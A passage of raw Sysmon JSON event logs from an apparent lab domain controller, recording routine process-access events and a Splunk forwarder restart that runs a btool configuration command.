06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3365,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3366,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3367,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-0010C1680500}\r\nTargetProcessId: 4100\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-0010C1680500}","TargetProcessId":"4100","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3368,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.885\r\nProcessGuid: {E2A3D6B1-1102-5F25-0000-00107D6B0500}\r\nProcessId: 1624\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nParentProcessId: 4864\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.885","ProcessGuid":"{E2A3D6B1-1102-5F25-0000-00107D6B0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","ParentProcessId":"4864","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3369,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nSourceProcessId: 4864\r\nSourceThreadId: 4872\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-00107D6B0500}\r\nTargetProcessId: 1624\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1893f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17106|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1385a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","SourceProcessId":"4864","SourceThreadId":"4872","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-00107D6B0500}","TargetProcessId":"1624","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1893f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17106|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1385a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3370,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-00107D6B0500}\r\nTargetProcessId: 1624\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-00107D6B0500}","TargetProcessId":"1624","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3371,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3372,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3373,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 